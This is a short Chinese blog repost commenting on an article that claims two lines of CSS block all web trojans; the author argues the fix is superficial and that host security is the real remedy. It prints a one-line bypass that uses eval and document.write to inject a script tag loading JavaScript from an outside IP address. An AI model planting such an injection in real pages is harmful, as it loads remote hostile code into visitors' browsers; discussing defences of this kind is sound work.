关于<<二行代码解决全部网页木马>>的文章

鬼仔注:前两天发过 <<二行代码解决全部网页木马>>

作者:lcx
来源:vbs小铺

原文在这:http://www.blueidea.com/tech/web/2008/5575.asp

主要目的是用css解决script标签里的http,这种方法治标不治本,我觉得防掉很难的,根治办法就是主机安全,不给别人黑掉的机会

突破方法有N种,最简单的突破办法,不把src=http放在<script>标签里。

代码:
<script>eval(document.write("<script src=http://192.168.8.100/1.js><\/script>"))</script>

相关日志

发表评论